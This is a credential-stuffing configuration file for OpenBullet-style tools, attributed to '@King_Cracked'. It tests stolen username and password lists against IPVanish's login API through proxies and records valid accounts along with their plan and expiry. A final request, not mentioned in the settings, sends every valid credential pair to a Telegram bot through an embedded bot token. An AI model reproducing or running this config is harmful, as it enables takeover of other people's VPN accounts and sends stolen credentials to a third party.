[SETTINGS]
{
  "Name": "IPVanish APP API by @King_Cracked",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-06-08T00:07:11.87924+00:00",
  "AdditionalInfo": "DISCOD https://discord.gg/6XBbYgPR  /TELEGRAM : https://t.me/Config_list  /https://t.me/OPEN_BUILLET_Configs",
  "RequiredPlugins": [],
  "Author": "@King_Cracked",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "IPVanish APP API by @King_Cracked",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#RandomID FUNCTION GenerateGUID -> VAR "guid" 

#Login REQUEST POST "https://api.ipvanish.com/api/v3/login" 
  CONTENT "{\"api_key\":\"15cb936e6d19cd7db1d6f94b96017541\",\"client\":\"Android-3.4.7.8.115303b115303\",\"os\":\"29\",\"password\":\"<PASS>\",\"username\":\"<USER>\",\"uuid\":\"<guid>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.ipvanish.com" 
  HEADER "user-agent: Android/ipvanish/1.2." 
  HEADER "x-client: ipvanish" 
  HEADER "x-client-version: 1.2." 
  HEADER "x-platform: Android" 

#Login_CHECK KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The username or password provided is incorrect" 
    KEY "code\":" 
  KEYCHAIN Success OR 
    KEY "sub_end_epoch" 
    KEY "access_expire_epoch" 
    KEY "access_token" 

#Type PARSE "<SOURCE>" JSON "account_type" -> VAR "Type" 

#Plan FUNCTION Translate 
  KEY "2" VALUE "Premium" 
  KEY "3" VALUE "Expired" 
  "<Type>" -> CAP "Plan" 

#Exp PARSE "<SOURCE>" JSON "sub_end_epoch" -> VAR "Exp" 

#Expiry FUNCTION UnixTimeToDate "yyyy-MM-dd:HH-mm-ss" "<Exp>" -> CAP "Expiry" 

#CT FUNCTION CurrentUnixTime -> VAR "ct" 

#Compute FUNCTION Compute "(<Exp>-<ct>)/86400" -> VAR "Compute" 

#Left FUNCTION Round "<Compute>" -> CAP "Days Left" 

#Hit_CHECK KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Days Left>" GreaterThan "0" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Days Left>" LessThan "0" 
    KEY "<Days Left>" EqualTo "0" 

#IamDark FUNCTION Constant "@King_Cracked" -> CAP "Config By" 

REQUEST POST "https://api.telegram.org/bot5360098719:AAFgCWH6dgyLtNZzZMgV7-YUagk3VCgG1dg/sendmessage?chat_id=-1001726520530" 
  CONTENT "&text= IP Vanish Hit %0A--------------------------------%0A<USER>:<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

